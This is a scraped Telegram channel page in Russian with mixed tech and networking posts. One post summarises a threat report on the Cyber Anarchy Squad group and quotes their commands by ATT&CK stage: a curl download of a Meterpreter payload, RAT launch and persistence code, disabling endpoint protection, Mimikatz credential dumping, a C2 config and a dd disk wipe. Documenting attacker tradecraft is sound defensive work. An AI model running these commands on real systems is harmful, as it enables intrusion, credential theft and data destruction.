Mikrotik Ninja – Telegram
Mikrotik Ninja
3.97K subscribers
384 photos
9 videos
57 files
1.23K links
Канал по новым компьютерным технологиям и защите компьютерных программ


Блог http://bubnovd.net
https://medium.com/@dbubnov
https://xakep.ru/author/bubnovd/
Мысли неглупых людей https://news.1rj.ru/str/channel1name
Книги https://news.1rj.ru/str/mreadninja
Download Telegram
Курс Large Language Model Agents
Сам курс уже заканчивается, но лекции и слайды доступны

- Foundation of LLMs
- Reasoning
- Planning, tool use
- LLM agent infrastructure
- Retrieval-augmented generation
- Code generation, data science
- Multimodal agents, robotics
- Evaluation and benchmarking on agent applications
- Privacy, safety and ethics
- Human-agent interaction, personalization, alignment
- Multi-agent collaboration

#LLM #course
💩3👍2🤮21🔥1👏1
Про "колл-центры" сбера
https://promo.sber.ru/kibrary/assets/berdyansk.pdf
👍3💩2😱1🤡1
Falcosidekick - коннектор Falco (eBPF аудит сисколов) ко всему на свете - позволит отправлять уведомленния о событиях в мессенджеры, БД, Jira, да куда угодно

И falcosidekick-ui - UI к нему

#falco #security
👍3
Сквозь тени анархии: разбираем атаки Cyber Anarchy Squad

Отчет о деятельности хак-группы. Интересно узнать какими инструментами пользуются атакующие:
1. Initial Access (Первоначальный доступ):
-Компрометация сервисов: Используются уязвимости в Jira, Confluence, MS SQL Server.

2. Execution (Выполнение):
- Запуск команд через MS SQL: cmd.exe /c
-Процесс cmd.exe запускается как дочерний процесс sqlservr.exe
- Запуск PowerShell-скриптов:
powershell.exe -ex bypass -f \\[DOMAIN]\netlogon\rm.ps1

-Загрузка обратной оболочки Meterpreter через c URL:
cmd.exe" /c cd %appdata% && dir && curl -O [URL]/sdc.exe


-Запуск Revenge RAT через PowerShell:
powershell.exe -WindowStyle Hidden -NoExit -Command 
[System.Reflection.Assembly]::LoadFile('C:\Users\<username>\Downloads\<exe_name>.exe').EntryPoint.Invoke($null, @())



3. Persistence (Закрепление):
-Создание учетных записей:
net user admin cas /add
net user admin admin123123123 /add

-Автозапуск через реестр:
RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
registryKey.SetValue("rpchost", "\"C:\\Windows\\System32\\rpchost.exe\"");

-Создание службы для RAT:
Program.hService = Helper.CreateService(Program.hSCM, "NgcMngrSvc", "Microsoft Passport Manager", 983551, 16, 2, 0, Program.system + "svxhost.exe", null, IntPtr.Zero, null, null, null);


4. Defense Evasion (Уклонение от обнаружения):
- Отключение EPP через PowerShell:
 $guidQuery = wmic product where "[redacted]" get IdentifyingNumber
$guid = $guidQuery | Select-String -Pattern "{[A-F0-9-]+}" | ForEach-Object { $_.Matches[0].Value }
msiexec.exe /x $guid /quiet

-Добавление исключений Windows Defender:
powershell Add-MpPreference -ExclusionPath '$windir\$system32'

- Имитация системных процессов:
С:\Windows\System32\svxhost.exe
C:\Windows\System32\drivers\etc\rpchost.exe



5. Credential Access (Доступ к учетным данным):
-Сбор паролей с использованием Mimikatz(пример извлечения хэшей): sekurlsa::logonpasswords


6. Discovery (Исследование инфраструктуры):
- Сбор информации о пользователях и системе:
 net user
systeminfo
net localgroup
cd %appdata% && whoami

WMI-запросы:
 SELECT * FROM Win32_OperatingSystem
SELECT UserName FROM Win32_ComputerSystem
SELECT * FROM WIN32_Processor



7. Command and Control (Управление):
-Конфигурация Spark RAT:
{
"secure": false,
"host": "[C2_SERVER]",
"port": 9610,
"path": "/",
"uuid": "3917b41****",
"key": "aa494c90****"
}


8. Impact (Нанесение ущерба):
- Шифрование файлов:
Используются LockBit и Babuk с расширениями, связанными с группой, например 3119.
-Удаление данных через dd:
 dd if=/dev/zero of=/dev/[VOLUME] bs=4M


Выжимку по командам стащил из Linkedin

#security #report
👍6🤔2👎1💩1🤣1
Отставить панику!
Всё обязательно починят
😁21🔥6🤡21
Ходят слухи, что в RouterOS завезут EVPN
https://forum.mikrotik.com/viewtopic.php?t=214071#p1120894
🔥6🤩3🤮1🤡1🖕1
У avito есть классная репа - справочник по работе в ИТ команде. Среди прочего в ней есть описание грейдов инженеров. Полезно для понимания как и куда расти
👍7🔥3🤡2👎1
Народ на форуме нашёл базу данных из 1990, которую написал какой-то ребёнок, чтобы вести учёт своей коллекции вкладышей для жевачки

Разыскивается автор этого чуда - Вадим Алексеев
🔥59👏62🤡2
Как слабый ноутбук заставил человека разобраться в работе игры без исходников и написать патч, в два раза уменьшающий аппетиты к RAM.

Читается как хороший детектив. Автору моё почтение

https://habr.com/ru/articles/110395/
🔥21👍6
Немножко про сети

Все знают про ширину канала в Wi-Fi и что этих каналов 11 (вы ошибаетесь 😊), но не каждый знает про MCS - Modulation and Coding Scheme

Точка доступа может выбрать разные типы модуляции в зависимости от состояния среды: помехи, уровень сигнала клиента, занятость полосы, ...

От типа модуляции зависит количество передаваемых по сети данных. Вот вам шикарная табличка пропускной способности на разных MCS

#wifi #mcs
🔥14👍4
Forwarded from Cult Of Wire
Снова wiki и снова взлом железочек. На этот раз HardBreak, an open-source Hardware Hacking Wiki.

Без срыва покровов и инноваций, но пошагово и в одном месте. Местами ещё есть пробелы, но работа автором проделана большая.

Что уже готово:
- Методология (Как вообще начать ковырять железки)
- Основы (Обзор общих протоколов и инструментов, необходимых для начала работы)
- Разведка (Выявление интересующих точек на печатной плате)
- Взаимодействие с интерфейсами (Как найти и использовать UART, JTAG, SPI)
- Обход мер защиты (voltage glitching)
- Практические ситуации на примере роутера Asus RT-N12 и дрона Parrot Anafi
- Анализ сети и Radio Hacking (в процессе)

Ссылки:
hardbreak.wiki
GitHub: HardBreak
🔥13🥱1
Чтобы картинка была чище

Из t.me/sysadminka
😁23👍1🔥1👏1🤔1
В Японии в вендинговом автомате Gachapon можно купить игрушечные 19’' стойки в комплекте с симпатичными мини‑серверами Dell PowerEdge, а также с коммутаторами Cisco и A10. Стоимость такого конструктора составляет $3,5.
😍42😁10🔥5🤷‍♂1👌1🤡1🤣1